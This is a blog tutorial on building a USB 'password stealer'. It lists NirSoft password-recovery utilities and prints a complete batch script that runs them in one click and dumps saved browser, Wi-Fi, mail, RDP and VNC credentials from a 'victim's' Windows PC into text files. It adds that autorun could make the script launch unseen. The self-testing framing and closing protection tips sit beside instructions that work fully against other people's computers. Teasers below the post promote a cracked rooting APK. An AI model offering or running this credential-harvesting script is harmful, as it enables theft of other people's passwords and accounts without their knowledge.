Skip to main content

​Create a USB Password Stealer to See How Secure Your Info Really Is

​Create a USB Password Stealer to See How Secure Your Info Really Is

​Create a USB Password Stealer to See How Secure Your Info Really Is

​Create a USB Password Stealer to See How Secure Your Info Really Is


Slacking on password security can have horrific consequences. Even so, it's easy to lose track of how many are vulnerable. With just a couple of files, you can steal passwords from nearly everywhere they're stored on a victim's Windows PC, including your own, just to see how secure they really are.
A good rule of thumb is that if you've stored a password on your computer, you've made it possible for someone else to steal with something as simple as a USB flash drive and a one-click script. This includes everything from wireless network keys to passwords you've saved in your browser. Hacker's Handbook has a great guide for the more experienced user, but we'll break it down for beginners here:



Step One: Collect Your Tools

​Create a USB Password Stealer to See How Secure Your Info Really Is
NirSoft makes a ton of utilities that we love, and they have a pretty good suite of security tools. We're going to use a few that recover passwords to create our ultimate USB tool.
Plug in your USB drive, and create a folder titled "Utilities". Then, download the following zip files (not the self-install executables) from the NirSoft Password Recovery Utilities page onto the thumb drive and—after extracting the files—place all of the .exe files in the Utilities folder:
  • MessenPass
  • Mail PassView
  • Protected Storage PassView
  • Dialupass
  • BulletsPassView
  • Network Password Recovery
  • SniffPass Password Sniffer
  • RouterPassView
  • PstPassword
  • WebBrowserPassView
  • WirelessKeyView
  • Remote Desktop PassView
  • VNCPassView
Each of these executable files recovers passwords from a specific place on the computer. For example, WirelessKeyView.exe pulls your wireless key, and WebBrowserPassView.exe grabs all of the passwords stored in your browsers. If you want to see what each one does in detail, check the NirSoft page linked above. If you see any other password recovery tools you want to try out, download them as well, but what we have here is a good starting point.

Step Two: Automate the Tools to Work With One Click (XP and Vista Only)

​Create a USB Password Stealer to See How Secure Your Info Really Is
Next, we're going to set up a script that runs all these utilities at once—allowing you to grab a giant cache of stored passwords in one click (though it only works properly on Windows XP and Vista, so if you're only using this on Windows 7 and above, you can skip this step). Open your text editor, and for each file you downloaded, write this line of code in one text file:
start filename /stext filename.txt
Replace "filename" with the name of the executable you just downloaded, including the file extension. When you replace "filename" after the slash, you will change the .exe to a .txt file extension. This is the password log the executable will create for you to see. A finished script should look like this:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt<br>start pspv.exe /stext pspv.txt
start Dialupass.exe /stext Dialupass.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start netpass.exe /stext netpass.txt
start sniffpass.exe /stext sniffpass.txt
start RouterPassView.exe /stext RouterPassView.txt
start PstPassword.exe /stext PstPassword.txt
start WebBrowserPassView.exe /stext WebBrowserPassView.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start rdpv.exe /stext rdpv.txt
start VNCPassView.exe /stext VNCPassView.txt
Once you're done writing the script, save the file as Launch.bat in the Utilities folder you created.

Step Three: Test Your New Password Stealer

​Create a USB Password Stealer to See How Secure Your Info Really Is
Now you will be able to recover the usernames and passwords from each of these programs. They will create detailed logs that show you the password, username, and source (like the Network name or website URL), which is all you really need to do damage. There's also the date the password was created, password strength, and other information depending on the program. Here's how to test your new password stealer to see how many passwords you've left vulnerable on your PC.

XP and Vista: Run the Script

Click the launch.bat file you just made to launch it. The password logs will appear in the Utilities folder as .txt files alongside the original executables. Each will have the same name as the .exe file they're sourced from. For example: the ChromePass.exe file will have a ChromePass.txt file that houses all of the recovered passwords and usernames. All you have to do is open the .txt files, and you'll see all your passwords.

Windows 7 and Above: Run Each Password Recovery App Individually

If you use Windows 7 or above, the script won't work for many of the apps, so you'll need to open them up individually. Double-click on each program and the list of passwords will pop up in a window. Select all that you want to save, and go to the File menu, and save the log as a .txt file in the original Utilities folder you created on your flash drive.
Use these logs to see for yourself how many passwords you've left vulnerable on your system. It's remarkably easy to find and take them!

Step Four: Protect Yourself

​Create a USB Password Stealer to See How Secure Your Info Really Is
Now that you know how vulnerable your information is, get serious about protecting yourself. Take these precautions:
  • If your computer has autorun enabled, disable it. It only takes a couple more lines of code to set the .bat file to launch automatically when the flash drive is plugged in, without the user even seeing what's happening.
  • Take measures like not allowing your browser to remember your passwords, or at least the important ones like mobile banking. Instead, use password managers with encryption like LastPass or another good password manager to store all of your passwords securely and out of harm's way.
  • Use two-factor authentication every chance you get. There are tons of ways for hackers to get your information if they want to. The second factor—something you have—could be what saves you in the end.
  • The obvious: always maintain physical control of your computer whenever possible. Never leave your PC unattended with anyone else, especially someone who's using a USB flash drive. In fact, it wouldn't hurt to offer to do the work yourself as often as possible when a friend asks if they can use your computer.
Strong passwords aren't all the protection you need. Understand how vulnerable your information really is, and build a nearly hack-proof password system to stay safe.

Comments

Post a Comment

Popular posts from this blog

How To Unblock Youtube To Watch Age-Restricted Videos

How To Unblock Youtube To Watch Age-Restricted Videos Today we are here with cool youtube tricks that is  How To Unblock Youtube To Watch Age-Restricted Videos . When you are in the country where some youtube videos is blocked you use VPN services where you have to go through the irritating ads from that VPN. Also there is a age restriction filter in youtube where you can’t see 18+ videos while you have proper proof to be 18+ to watch the vidoes. But this restriction can be removed with a cool youtube trick that will help you to watch any of your favorite youtube videos without any age or country restriction. So have a look on complete guide below to proceed. How To Unblock Youtube To Watch Age-Restricted Videos So read out the method where you will not need to login into youtube to watch that movies. You just have to follow some simple steps below to proceed with unblocking youtube for you. #1 Unblock Youtube Age-Restricted Videos Using URL Change First of all open youtube an...
Post a Comment
Read more

How to Get Android 6.0 Boot Animation On Your Android

How to Get Android 6.0 Boot Animation On Your Android oday we are here with cool android trick that is  How to Get Android 6.0 Boot Animation on Your Android . Android 6 is going to come soon and the development for this cool version of android is started and there are lots of tweaks that are now getting ready for this version of android. Android 6 will come up with all new feature that all users will love to have. And in this post we are going to discuss a way to have boot animation of Android 6(Marshmallow) in your android now. Follow up the complete guide below to proceed. How to Get Android 6 Boot Animation on Your Android In this tutorial you will be using a custom boot animation for your android device that will replace with your stock boot animation of your android device. And you will get latest boot animation of android v6.0. So follow up the steps below to proceed. Steps To Get Android 6.0 Boot Animation on Your Android First of all you need download  Marshmallo...
Post a Comment
Read more

KINGO ROOT v3.0 Cracked APK is Here! [Root Almost Any Android Device]

KINGO ROOT v3.0 Cracked APK is Here! [Root Almost Any Android Device] KINGO ROOT  Just like Kingroot Apk, Kingoroot is the best root tool to root your device.Just a few simple steps can get you a rooted device within minutes.Install it on your Android device, click to root and voila, it is done. Features  Constantly updating and improving root scripts in KingoRoot makes it powerful in every way. It achieved exact model matching and delivers the most possible solution for each device. Support almost all Android versions and Manufacturers customized devices. It perfectly covers Android 1.5 to 5.0 mainstream models from different manufacturers including Samsung, Google, HTC, Sony and every other android phones. What’s Cracked  AD-FREE How to Root ? Download the apk from the link given below. Install the apk. Click to root. Done, Enjoy your root 😀 Screenshots Download & Links  KINGO ROOT v3.0 Cracked APK   /  Mirror  (1.2 Mb) KINGO ROOT for Windo...
Post a Comment
Read more